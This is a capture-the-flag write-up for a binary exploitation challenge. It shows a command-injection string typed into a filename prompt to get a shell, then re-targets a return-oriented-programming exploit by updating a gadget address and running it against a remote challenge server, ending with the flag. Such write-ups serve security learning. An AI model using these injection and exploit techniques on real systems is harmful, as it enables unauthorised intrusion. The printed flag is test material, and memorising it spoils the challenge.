Sacred Scrolls' Revenge

4 minutes to read

This challenge is a fixed version of Sacred Scrolls. Almost all the program behavior is the same as in the previous version, so read that write-up before this one.

They fixed the challenge due to an unintended solution (command injection):

$ ./sacred_scrolls


                                            ▄▞▀▀▀▜▄▖
          ▗     ▖       ▗     ▖       ▗  ▖▟▞▖▘▗▖▚▘ ▝▀▄
   ▖▝  ▘ ▝   ▝    ▝  ▘ ▝   ▝    ▝  ▘ ▝ ▖▌▀ ▖▖▚▘▝▗▝▝ ▗▝▄▖▘ ▘
                                   ▗▗▞▘▚▝▝▝▗▝  ▘   ▖  ▗▚▖
              ▗  ▖  ▗       ▗  ▖▗▄▜▝▚▝▝▖▘▘▝   ▖ ▖ ▘ ▗ ▖▛▞
   ▖  ▖▘ ▖ ▗ ▘         ▖ ▗▝  ▗▄▞▚▗▗▘ ▝           ▖ ▖ ▖▘▀▀▖
                   ▖      ▗▖▛▚▗▝ ▖        ▗ ▝ ▝ ▘ ▖ ▘▗▗▗▝▌
                 ▗    ▗▄▞▀▚▝ ▖          ▖▝  ▖▝ ▖▗ ▖▘▝▗▗▄▞▘
  ▖ ▝     ▗     ▖  ▄▞▀▚▗▝▝  ▖        ▘ ▘ ▗▝ ▖ ▘▗▗▝▖▞▞▌▜▐▐▖
        ▗     ▘▄▖▀▀▗▝▝▗ ▝         ▗ ▘ ▖▖▘▖▝▗ ▚▝▖▖▌▌▌▙▞▌▀
       ▘   ▄▞▞▀▗▝▞▝▖▝           ▘▝  ▖▘▖▖▘▞▝▖▚▚▐▐▟▟▞▘▘
    ▖▝ ▄▖▛▀▖▞▖▌▘▘▝▖      ▖▝ ▗ ▝ ▖▗ ▘▖▖▖▞▐▗▚▚▙▙▛▀▝
   ▄▄▜▚▙▄▄▀▝▗ ▄▝▝▘  ▘ ▘ ▘    ▗ ▖▗ ▝▖▄▐▐▐▟▟▜▜▝             ▘
  ▐▟▛█▜▚▚▚▞▄▖▘     ▖  ▗  ▗ ▘▝ ▖▗▗▐▝▄▟▞▙█▐▝
  ▐▚▛▞▜▚▟ ▝▚▚ ▘▝ ▝  ▝▗ ▖▘ ▗▝▝▖▞▖▌▙▜▙▙▀▘      ▗ ▝     ▗  ▘
  ▜▐▚▐▐▜▟█▖ ▀▙▖▗ ▖▗▝ ▖▗ ▖▘▖▞▞▟▞▛▛▟▀        ▗        ▘     ▖
  ▝▛▗ ▖▌▙▙█▘ ▗▚ ▖▗ ▗▗▗▗▚▐▐▐▞▛▟▞▛▝                ▗▝
   █ ▖▗▀▝▝▛█▗ ▜▘▖▗▝▗▗▚▚▚▙▜▞▙▜▝        ▝  ▘     ▗        ▖
   ▐▖▖ ▚ ▚▜▜▖▞▐▚▗▗▐▗▜▞▛▙▚▙▀         ▝      ▗ ▘        ▗
    ▚▝▖▚▚▖▀▛▞▐▟▚▘▌▌▛▙▜▟▝▘         ▗                  ▗
  ▗ ▝▌▝▖▌▜▚▛▟█▛▙▜▞▛▛▞▘                ▖ ▝        ▖ ▗▝     ▘
     ▝▙▗▐▐▐▜▜▙█▞▟▞▛▝             ▗   ▖    ▗  ▗ ▝
     ▝▘▌▖▖▙▀▙▜▚▜▝             ▗ ▘
        ▝▀▗▀▞▞▘▘      ▝  ▘ ▗▝           ▗               ▝
  ▝ ▝            ▗▝                 ▘      ▝  ▝   ▖▝
                                       ▘              ▝


[+] All ⅀ ℙ ∉ ⎳ ⎳ ⅀ have been whiped out..

Enter your wizard tag: asdf

Interact with magic library asdf

1. Upload ⅀ ℙ ∉ ⎳ ⎳
2. Read   ⅀ ℙ ∉ ⎳ ⎳
2. Cast   ⅀ ℙ ∉ ⎳ ⎳
3. Leave

>> 1

[*] Enter file (it will be named spell.zip): '; /bin/sh; echo '  

$ ls
glibc  sacred_scrolls  sacred_scrolls_revenge  solve.py

Trying the previous exploit

Let’s try to run the previous exploit on the updated program:

$ md5sum sacred_scrolls*
33c5fddcfed4332d797e7f2f5d74e75f  sacred_scrolls
c4e656f3ecaa810d7d3e7c83922eff13  sacred_scrolls_revenge

$ cp solve.py solve_revenge.py

$ sed -i s/sacred_scrolls/sacred_scrolls_revenge/g solve_revenge.py  

$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3933065
[*] "/bin/sh" address: 0x7fca52de9698
  adding: spell.txt (deflated 54%)
[*] Switching to interactive mode

[-] This spell is not quiet effective, thus it will not be saved!
[*] Got EOF while reading in interactive
$

And it doesn’t work… At least, it seems that the address of "/bin/sh" is still there.

Fixing the exploit

One thing to take into account is that the address of pop rdi; ret and the address of system@plt have probably changed:

$ ROPgadget --binary sacred_scrolls | grep 'pop rdi'
0x0000000000401183 : pop rdi ; ret

$ ROPgadget --binary sacred_scrolls_revenge | grep 'pop rdi'
0x00000000004011b3 : pop rdi ; ret

$ objdump -M intel -d sacred_scrolls | grep system
0000000000400820 <system@plt>:
  400820:       ff 25 6a 27 20 00       jmp    QWORD PTR [rip+0x20276a]        # 602f90 <system@GLIBC_2.2.5>  
  400a28:       e8 f3 fd ff ff          call   400820 <system@plt>
  400a34:       e8 e7 fd ff ff          call   400820 <system@plt>
  400c6c:       e8 af fb ff ff          call   400820 <system@plt>
  400cfb:       e8 20 fb ff ff          call   400820 <system@plt>

$ objdump -M intel -d sacred_scrolls_revenge | grep system
0000000000400820 <system@plt>:
  400820:       ff 25 6a 27 20 00       jmp    QWORD PTR [rip+0x20276a]        # 602f90 <system@GLIBC_2.2.5>
  400a28:       e8 f3 fd ff ff          call   400820 <system@plt>
  400a34:       e8 e7 fd ff ff          call   400820 <system@plt>
  400c9a:       e8 81 fb ff ff          call   400820 <system@plt>
  400d29:       e8 f2 fa ff ff          call   400820 <system@plt>

Indeed, the gadget addresses are different. Let’s update this value and run the exploit again:

$ sed -i s/401183/4011b3/g solve_revenge.py

$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3934860  
[*] "/bin/sh" address: 0x7f1196b16698
  adding: spell.txt (deflated 54%)
[*] Switching to interactive mode

[-] This spell is not quiet effective, thus it will not be saved!
$ ls
glibc        sacred_scrolls_revenge    solve_revenge.py  spell.zip
sacred_scrolls    solve.py        spell.txt

There we have it.

Flag

So, let’s try remotely:

$ python3 solve_revenge.py 178.62.5.219:32580
[*] './sacred_scrolls_revenge'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[+] Opening connection to 178.62.5.219 on port 32580: Done
[*] "/bin/sh" address: 0x7fc46b11f698
updating: spell.txt (deflated 54%)
[*] Switching to interactive mode

[-] This spell is not quiet effective, thus it will not be saved!  
$ ls
flag.txt
glibc
sacred_scrolls
spell.txt
spell.zip
$ cat flag.txt
HTB{m4y_th3_b0y_wh0_l1v3d_h3lp_u}